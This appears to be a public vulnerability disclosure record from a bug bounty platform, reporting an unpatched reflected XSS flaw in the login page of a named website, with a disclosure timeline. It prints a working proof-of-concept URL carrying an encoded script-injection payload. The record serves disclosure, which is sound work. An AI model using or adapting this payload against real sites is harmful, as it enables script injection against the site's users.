Vulnerable URL:
https://time.gnsadmin.com/qqest/Login/Login.asp?message=%3C/title%3E%3C/script/%27-alert%280%29-%27%22-%22--%3E%3Cimg/onerror=%22;alert%28/XSSPOSED/%29;%22src=1%3E
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
26.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
Google Pagerank |
1 |
VIP website status: |
No |
Check time.gnsadmin.com SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
12 March, 2016 21:06 GMT |
Generic security notifications sent to website owner |
12 March, 2016 21:09 GMT |
Notification sent to subscribers (without technical details) |
12 March, 2016 22:17 GMT |
Vulnerability details disclosed by researcher |
4 June, 2016 21:12 GMT |